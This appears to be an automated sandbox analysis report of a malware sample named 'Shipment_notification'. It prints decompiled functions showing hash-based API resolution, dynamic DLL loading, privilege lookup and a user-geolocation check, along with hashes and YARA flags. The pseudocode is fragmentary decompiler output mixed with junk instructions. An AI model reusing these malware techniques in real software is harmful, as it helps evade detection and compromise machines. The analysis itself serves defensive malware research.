                                                                                • Not Executed
                                                                                control_flow_graph 383 4098f7-4098f9 384 409945-40995b 383->384 385 4098fb call 40cee3 call 402de3 call 4195b3 383->385 387 409963-409995 call 410303 call 41e743 384->387 405 4098f0-4098f6 385->405 406 4098b9-4098ca PostThreadMessageW 385->406 396 409997-40999f 387->396 397 4099ca-4099d2 387->397 400 4099a1-4099a8 396->400 401 4099b9-4099c3 396->401 400->401 403 4099aa-4099b1 400->403 401->387 404 4099c5-4099c8 401->404 403->401 407 4099b3-4099b7 403->407 408 4099f0-409a02 call 41e6d3 404->408 406->405 409 4098cc-4098ed call 40c5b3 406->409 407->401 410 4099d3-4099ed call 420163 407->410 408->397 417 409a04-409a6f call 41df53 408->417 409->405 410->408 417->397 420 409a75-409ad1 call 41df93 417->420 420->397 423 409ad7-409b24 call 41f6d3 call 41f6f3 call 420383 call 420163 call 4191a3 420->423
                                                                                C-Code - Quality: 32%
                                                                                			E004098F7(void* __ebx, void* __eflags) {
				void* _t4;
				int _t6;
				long _t15;
				void* _t16;
				int _t17;
				void* _t19;

				asm("adc esp, ebp");
				asm("loopne 0x4c");
				_push(_t16); // executed
				_t4 = E0040CEE3(__eflags); // executed
				_t6 = E004195B3(_t16, _t4, 0, 0, E00402DE3(0x2edf3f3f));
				_t17 = _t6;
				if(_t17 != 0) {
					_t15 =  *(_t19 + 0xc);
					_t6 = PostThreadMessageW(_t15, 0x111, 0, 0); // executed
					if(_t6 == 0) {
						_t6 =  *_t17(_t15, 0x8003, _t19 + (E0040C5B3(1, 8, __ebx + 0x874) & 0x000000ff) - 0x40, _t6);
					}
				}
				return _t6;
			}









                                                                                0x004098f7
                                                                                0x004098f9
                                                                                0x00409892
                                                                                0x00409893
                                                                                0x004098ab
                                                                                0x004098b0
                                                                                0x004098b7
                                                                                0x004098b9
                                                                                0x004098c6
                                                                                0x004098ca
                                                                                0x004098ee
                                                                                0x004098ee
                                                                                0x004098ca
                                                                                0x004098f6

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(00004DEE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: cd066795df68b1277eac19a887ded8432d6587d6991ec6b597d0668f58931636
                                                                                • Instruction ID: 0a7f5cea78c0af45a8da72c6c271f96aa2f7ba8f7ce672b3000da44c6b93de3c
                                                                                • Opcode Fuzzy Hash: cd066795df68b1277eac19a887ded8432d6587d6991ec6b597d0668f58931636
                                                                                • Instruction Fuzzy Hash: C551C3B0A01305AFD724DF25DC86BEB73E8EB05304F10456EF949A7381DB78AE418B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409826 Relevance: 1.6, APIs: 1, Instructions: 73threadwindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 434 409826-409828 435 409890 434->435 436 40982a-40982e 434->436 439 4098b2-4098b7 435->439 440 409892-4098b0 call 40cee3 call 402de3 call 4195b3 435->440 437 409830 436->437 438 4097bc-4097c5 436->438 437->435 441 4097b6-4097ba 438->441 442 4097c7-4097f1 call 420383 call 420163 438->442 443 4098f0-4098f6 439->443 444 4098b9-4098ca PostThreadMessageW 439->444 440->439 441->438 441->442 444->443 447 4098cc-4098ed call 40c5b3 444->447 447->443
                                                                                C-Code - Quality: 44%
                                                                                			E00409826(short* __ecx, void* __eflags) {
				void* __esi;
				int _t9;
				void* _t12;
				short* _t23;
				long _t29;
				int _t32;
				void* _t35;

				_t23 = __ecx;
				if(__eflags != 0) {
					if(__eflags < 0) {
						_push(_t32); // executed
						_t12 = E0040CEE3(__eflags); // executed
						_t9 = E004195B3(_t32, _t12, 0, 0, E00402DE3(0x2edf3f3f));
						_t32 = _t9;
					}
					__eflags = _t32;
					if(_t32 != 0) {
						_t29 =  *(_t35 + 0xc);
						_t9 = PostThreadMessageW(_t29, 0x111, 0, 0); // executed
						__eflags = _t9;
						if(_t9 == 0) {
							__eflags = 0x92d;
							_t9 =  *_t32(_t29, 0x8003, _t35 + (E0040C5B3(1, 8, 0x92d) & 0x000000ff) - 0x40, _t9);
						}
					}
					return _t9;
				} else {
					asm("aam 0xba");
					asm("lodsb");
					_pop(__eax);
					if(__eflags != 0) {
						while(1) {
							 *_t23 = 0;
							_t23 = _t23 - 2;
							_t9 = _t9 - 1;
							if(_t9 == 0) {
								break;
							}
							if( *_t23 != 0x5c) {
								continue;
							}
							break;
						}
						E00420163( *((intOrPtr*)(_t35 + 0x10)), _t35 - 0x208, E00420383(_t35 - 0x208) + _t15);
						return 0;
					} else {
						asm("sbb bl, [edx+eax*2-0x6a197aa]");
						_push(__esi);
						asm("adc eax, ebp");
						__eax = __eax ^ 0x83000163;
						__eflags = __eax;
						asm("les eax, [ebx+ecx*4]");
						asm("lock call 0x161f1");
						__eax = __eax + __esi + 0x1000;
						__esi = 0x11c6f95e;
						return __eax;
					}
				}
			}










                                                                                0x00409826
                                                                                0x00409828
                                                                                0x00409890
                                                                                0x00409892
                                                                                0x00409893
                                                                                0x004098ab
                                                                                0x004098b0
                                                                                0x004098b0
                                                                                0x004098b5
                                                                                0x004098b7
                                                                                0x004098b9
                                                                                0x004098c6
                                                                                0x004098c8
                                                                                0x004098ca
                                                                                0x004098cd
                                                                                0x004098ee
                                                                                0x004098ee
                                                                                0x004098ca
                                                                                0x004098f6
                                                                                0x0040982a
                                                                                0x0040982a
                                                                                0x0040982c
                                                                                0x0040982d
                                                                                0x0040982e
                                                                                0x004097bc
                                                                                0x004097be
                                                                                0x004097c1
                                                                                0x004097c4
                                                                                0x004097c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004097ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004097ba
                                                                                0x004097e1
                                                                                0x004097f1
                                                                                0x00409830
                                                                                0x00409830
                                                                                0x00409833
                                                                                0x00409838
                                                                                0x0040983a
                                                                                0x0040983a
                                                                                0x0040983f
                                                                                0x00409842
                                                                                0x00409848
                                                                                0x0040984f
                                                                                0x00409850
                                                                                0x00409850
                                                                                0x0040982e

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(00004DEE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 5628ca8e08e777140ad9ad9f9da3ec236d1ef9a60c9e00e9a96731ba31d01b4d
                                                                                • Instruction ID: d66bc7d12d365ba35ff73bcd331e52d2c0967b730b952776c25f27f339125059
                                                                                • Opcode Fuzzy Hash: 5628ca8e08e777140ad9ad9f9da3ec236d1ef9a60c9e00e9a96731ba31d01b4d
                                                                                • Instruction Fuzzy Hash: DA11E763A5021466DA20AA65AC42BFB22599B51714F5842BBFA04FA2C3EA795D0142D8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E8A5 Relevance: 1.6, APIs: 1, Instructions: 71memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 459 41e8a5-41e8b1 460 41e8b3-41e8ca call 41f213 459->460 461 41e925-41e97b call 41f213 459->461 464 41e8cf-41e8e4 RtlFreeHeap 460->464
                                                                                C-Code - Quality: 43%
                                                                                			E0041E8A5(void* __eax, signed char* __ecx, void* __edx, void* __edi, void* _a4, long _a8, void* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56) {
				intOrPtr _v0;
				char _t34;
				void* _t54;
				intOrPtr* _t55;

				_push(cs);
				 *__ecx =  *__ecx & 0x000000ff;
				asm("outsb");
				if(__edi - 1 < 0) {
					asm("in al, dx");
					_t24 = _a8;
					_t9 = _t24 + 0x890; // 0x5aefd17a
					_t10 = _t24 + 0xaac; // 0x40af4b
					_t55 = _t10;
					E0041F213( *_t9, _a8, _t55,  *_t9, 0, 0x37, _t54);
					return  *((intOrPtr*)( *_t55))(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52, _a56);
				} else {
					_t4 = _v0 + 0xaa0; // 0xaa0
					E0041F213( *((intOrPtr*)(_v0 + 0x14)), _t31, _t4,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x35, _t54);
					_t34 = RtlFreeHeap(_a4, _a8, _a12); // executed
					return _t34;
				}
			}







                                                                                0x0041e8a5
                                                                                0x0041e8a6
                                                                                0x0041e8b0
                                                                                0x0041e8b1
                                                                                0x0041e925
                                                                                0x0041e926
                                                                                0x0041e929
                                                                                0x0041e935
                                                                                0x0041e935
                                                                                0x0041e93d
                                                                                0x0041e97b
                                                                                0x0041e8b3
                                                                                0x0041e8c2
                                                                                0x0041e8ca
                                                                                0x0041e8e0
                                                                                0x0041e8e4
                                                                                0x0041e8e4

                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,B4CA94F2,00000000,?), ref: 0041E8E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: e93a13d72c2344c902acb8c86f8b8af0cf33ecac48afd69637f32b49ada5532e
                                                                                • Instruction ID: 158c02eab6a9d0bb0fb2c308271c8f1e82c9818b3fe0a9f5157cd3582a946522
                                                                                • Opcode Fuzzy Hash: e93a13d72c2344c902acb8c86f8b8af0cf33ecac48afd69637f32b49ada5532e
                                                                                • Instruction Fuzzy Hash: 2A211AB2204108AFCB14DF99DC44EEB37ADEF8D764F158258FA4D97291C630E951CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409863 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 58%
                                                                                			E00409863(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				int _t12;
				void* _t16;
				long _t23;
				int _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E004201E3( &_v67, 0, 0x3f);
				_t12 = E00420C93( &_v68, 3);
				_t18 = _a4;
				_push( &_v68);
				_t25 = _a4 + 0x20;
				if(_t30 < 0) {
					_push(_t25); // executed
					_t16 = E0040CEE3(_t30); // executed
					_t12 = E004195B3(_t25, _t16, 0, 0, E00402DE3(0x2edf3f3f));
					_t25 = _t12;
				}
				if(_t25 != 0) {
					_t23 = _a8;
					_t12 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					if(_t12 == 0) {
						return  *_t25(_t23, 0x8003, _t26 + (E0040C5B3(1, 8, _t18 + 0x874) & 0x000000ff) - 0x40, _t12);
					}
				}
				return _t12;
			}











                                                                                0x00409863
                                                                                0x00409874
                                                                                0x00409878
                                                                                0x00409883
                                                                                0x00409888
                                                                                0x0040988e
                                                                                0x0040988f
                                                                                0x00409890
                                                                                0x00409892
                                                                                0x00409893
                                                                                0x004098ab
                                                                                0x004098b0
                                                                                0x004098b0
                                                                                0x004098b7
                                                                                0x004098b9
                                                                                0x004098c6
                                                                                0x004098ca
                                                                                0x00000000
                                                                                0x004098ee
                                                                                0x004098ca
                                                                                0x004098f6

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(00004DEE,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: b248be3027dfd036a61d52b0a6598d3c4634be19f75245087f33f404c89d3479
                                                                                • Instruction ID: dc9b969e7c48ca82d68593da8a01ca9fdb5293d2f28ad7bbdbe57e762768817d
                                                                                • Opcode Fuzzy Hash: b248be3027dfd036a61d52b0a6598d3c4634be19f75245087f33f404c89d3479
                                                                                • Instruction Fuzzy Hash: 9801DB72A40318B7E710A6919C82FFF376C9B40B54F140129FF04BA2C2DAA8AD0547E9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041EA08 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 509 41ea08-41ea11 510 41ea13-41ea2d call 41f213 509->510 511 41e99e 509->511 515 41ea32-41ea47 LookupPrivilegeValueW 510->515 512 41e9a0-41e9a5 511->512 513 41e9a8-41e9b7 511->513 512->513
                                                                                C-Code - Quality: 22%
                                                                                			E0041EA08(void* __edi, signed int __esi, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12, intOrPtr _a16, intOrPtr _a20) {
				int _v0;
				void* __ebp;
				intOrPtr* _t10;
				intOrPtr _t13;
				signed int _t17;
				signed int _t22;

				asm("adc eax, 0x17c19e08");
				_t17 = __esi & 0xfffffff9;
				_t22 = _t17;
				if(_t22 > 0) {
					if(_t22 < 0) {
						 *_t10 =  *_t10 + _t10;
						_t13 = _a20;
						_t10 = _a16;
					}
					return  *((intOrPtr*)( *_t17))(_a12, _t10, _t13);
				} else {
					__ebp = __esp;
					__eax = _v0;
					__eax = _a8;
					__esp = __esp + 0x14;
					__eax = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
					__esi = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}









                                                                                0x0041ea09
                                                                                0x0041ea0e
                                                                                0x0041ea0e
                                                                                0x0041ea11
                                                                                0x0041e99e
                                                                                0x0041e9a0
                                                                                0x0041e9a2
                                                                                0x0041e9a5
                                                                                0x0041e9a5
                                                                                0x0041e9b7
                                                                                0x0041ea13
                                                                                0x0041ea14
                                                                                0x0041ea16
                                                                                0x0041ea35
                                                                                0x0041ea3b
                                                                                0x0041ea43
                                                                                0x0041ea45
                                                                                0x0041ea46
                                                                                0x0041ea47
                                                                                0x0041ea47

                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEB5,0040FEB5,?,00000000,?,?), ref: 0041EA43
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: 109c2b410f2cf4dfc690fabb8d12f0f1cde150f3a80386b1063adefbecdb30a0
                                                                                • Instruction ID: 31181cc0f49a02b331626beb85e6f2280699e734c2da2338b02e7fad206ebf2d
                                                                                • Opcode Fuzzy Hash: 109c2b410f2cf4dfc690fabb8d12f0f1cde150f3a80386b1063adefbecdb30a0
                                                                                • Instruction Fuzzy Hash: 5BF08CF6604204ABDB20EF59DC40EEB73A9EF84624F058155FD4857282C631E850CBB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040CEDA Relevance: 1.5, APIs: 1, Instructions: 40libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 517 40ceda-40cedd 518 40cf2e 517->518 519 40cedf-40cf0c call 420ee3 517->519 521 40cf30-40cf41 call 41f783 518->521 524 40cf12-40cf20 call 421403 519->524 525 40cf0e-40cf11 519->525 528 40cf43-40cf57 LdrLoadDll 521->528 529 40cf5a-40cf5d 521->529 524->521 531 40cf22-40cf2d call 421683 524->531 528->529 531->521
                                                                                C-Code - Quality: 89%
                                                                                			E0040CEDA(void* __eax, void* __eflags) {
				struct _OBJDIR_INFORMATION _t17;
				void* _t23;
				struct _OBJDIR_INFORMATION _t25;

				 *0xFFFFFFFFEC8B550B =  !( *0xFFFFFFFFEC8B550B);
				if(__eflags == 0) {
					L6:
					asm("les ecx, [eax]");
					goto L7;
				} else {
					_push(0xec8b5544);
					 *0xFFFFFFFFEC8B5540 = 0xffffffffec8b5330;
					_t23 = E00420EE3(0xffffffffec8b553c, 0x104,  *0xFFFFFFFFEC8B5550);
					if(_t23 != 0) {
						_t25 = E00421403(__eflags,  *((intOrPtr*)(0xffffffffec8b5540)));
						__eflags = _t25;
						if(_t25 != 0) {
							E00421683(0xffffffffec8b553c, 0);
							goto L6;
						}
						L7:
						_t17 = E0041F783( *((intOrPtr*)(0xffffffffec8b5540)));
						 *0xFFFFFFFFEC8B5538 = _t17;
						__eflags = _t17;
						if(_t17 == 0) {
							LdrLoadDll(0, 0, 0xffffffffec8b553c, 0xffffffffec8b5538); // executed
							_t17 =  *0xFFFFFFFFEC8B5538;
						}
						return _t17;
					} else {
						return _t23;
					}
				}
			}






                                                                                0x0040ceda
                                                                                0x0040cedd
                                                                                0x0040cf2e
                                                                                0x0040cf2e
                                                                                0x00000000
                                                                                0x0040cedf
                                                                                0x0040cee3
                                                                                0x0040ceff
                                                                                0x0040cf02
                                                                                0x0040cf0c
                                                                                0x0040cf16
                                                                                0x0040cf1e
                                                                                0x0040cf20
                                                                                0x0040cf28
                                                                                0x00000000
                                                                                0x0040cf2d
                                                                                0x0040cf30
                                                                                0x0040cf34
                                                                                0x0040cf3c
                                                                                0x0040cf3f
                                                                                0x0040cf41
                                                                                0x0040cf55
                                                                                0x0040cf57
                                                                                0x0040cf57
                                                                                0x0040cf5d
                                                                                0x0040cf0e
                                                                                0x0040cf11
                                                                                0x0040cf11
                                                                                0x0040cf0c

                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF55
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: fd75c15cc45b9523ee819df40a56c88ad65438f5761ff60e2e265aff708c0c7e
                                                                                • Instruction ID: 0f4affe130e25fad1bc603e3705e8b5f2aaa7d88b3879a8a62bc0942e3d9f2ea
                                                                                • Opcode Fuzzy Hash: fd75c15cc45b9523ee819df40a56c88ad65438f5761ff60e2e265aff708c0c7e
                                                                                • Instruction Fuzzy Hash: 0FF06275D4010EABCB00DB94D981AEDB374AB44308F00829AE918AB280E5349A588B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410063 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00410063(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                                0x0041007d
                                                                                0x00410087
                                                                                0x0041008d
                                                                                0x0041009c
                                                                                0x0041008a
                                                                                0x0041008a
                                                                                0x0041008a

                                                                                APIs
                                                                                • GetUserGeoID.KERNELBASE(00000010), ref: 0041008D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: User
                                                                                • String ID:
                                                                                • API String ID: 765557111-0
                                                                                • Opcode ID: b07fe1e0b831da6324c709ae2ee113a1a2a707ef7a271a80feb8d051264812d7
                                                                                • Instruction ID: ea4a54c2336c31a8fb6bc0c082717e72071dcac9837b84e3ca3e21831ded48f4
                                                                                • Opcode Fuzzy Hash: b07fe1e0b831da6324c709ae2ee113a1a2a707ef7a271a80feb8d051264812d7
                                                                                • Instruction Fuzzy Hash: 76E0C273A8030466FA3091A59C42FB6364F5B84B00F048475F90CE62C2D5A8E8C00018
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E873 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00418C69,?,00419410,00419410,?,00418C69,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                • Instruction ID: 48c748e902c44044de1d1892783f5007a8ec5904af658d79bb1b07a4e6c6e50d
                                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                • Instruction Fuzzy Hash: 08E046B6600208ABCB24EF89DC45EE737ADEF88764F018059FE085B242C630F914CAF5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E8B3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,B4CA94F2,00000000,?), ref: 0041E8E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                • Instruction ID: eb5ae98e075ab63003722d577f40a8e5fd82e897943c343f669005370879adf1
                                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                • Instruction Fuzzy Hash: 38E012B5600208ABCB24EF89DC49EA737ADAF88754F018059BA095B282C630E914CAB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041EA13 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEB5,0040FEB5,?,00000000,?,?), ref: 0041EA43
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: bb6c04a6f9ab4fa2f1e18d158ab997fee5d61c5a47249bc15045aac120ba103c
                                                                                • Instruction ID: 033a7fb9fa2086201df8b3836a21ca132c55e4e19129a3f6e3396252481e1a2e
                                                                                • Opcode Fuzzy Hash: bb6c04a6f9ab4fa2f1e18d158ab997fee5d61c5a47249bc15045aac120ba103c
                                                                                • Instruction Fuzzy Hash: 96E01AB5600304ABC720EF89DC45EE737ADEF88654F018065BA0857242CA35E954CBF5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B2967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 92044c28cb275009977861b89eee7390f2f734194cf05b9bdf586ea9625209e0
                                                                                • Instruction ID: a8596e45de4bd694f7978489d8cb5d382b53af46d3ac7a7f4d8895194d89b5eb
                                                                                • Opcode Fuzzy Hash: 92044c28cb275009977861b89eee7390f2f734194cf05b9bdf586ea9625209e0
                                                                                • Instruction Fuzzy Hash: 32B09B729014D5C9D716D7A446087177940B7D0745F56C4A5E1060641B4778C0B5F5B5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 01B9B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01B9B323
                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01B9B476
                                                                                • The resource is owned shared by %d threads, xrefs: 01B9B37E
                                                                                • a NULL pointer, xrefs: 01B9B4E0
                                                                                • *** Inpage error in %ws:%s, xrefs: 01B9B418
                                                                                • an invalid address, %p, xrefs: 01B9B4CF
                                                                                • *** enter .exr %p for the exception record, xrefs: 01B9B4F1
                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 01B9B48F
                                                                                • This failed because of error %Ix., xrefs: 01B9B446
                                                                                • The critical section is owned by thread %p., xrefs: 01B9B3B9
                                                                                • *** enter .cxr %p for the context, xrefs: 01B9B50D
                                                                                • The instruction at %p referenced memory at %p., xrefs: 01B9B432
                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 01B9B352
                                                                                • <unknown>, xrefs: 01B9B27E, 01B9B2D1, 01B9B350, 01B9B399, 01B9B417, 01B9B48E
                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01B9B39B
                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01B9B38F
                                                                                • The instruction at %p tried to %s , xrefs: 01B9B4B6
                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01B9B314
                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01B9B2DC
                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01B9B3D6
                                                                                • Go determine why that thread has not released the critical section., xrefs: 01B9B3C5
                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01B9B484
                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01B9B47D
                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01B9B305
                                                                                • The resource is owned exclusively by thread %p, xrefs: 01B9B374
                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01B9B2F3
                                                                                • read from, xrefs: 01B9B4AD, 01B9B4B2
                                                                                • *** then kb to get the faulting stack, xrefs: 01B9B51C
                                                                                • write to, xrefs: 01B9B4A6
                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01B9B53F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
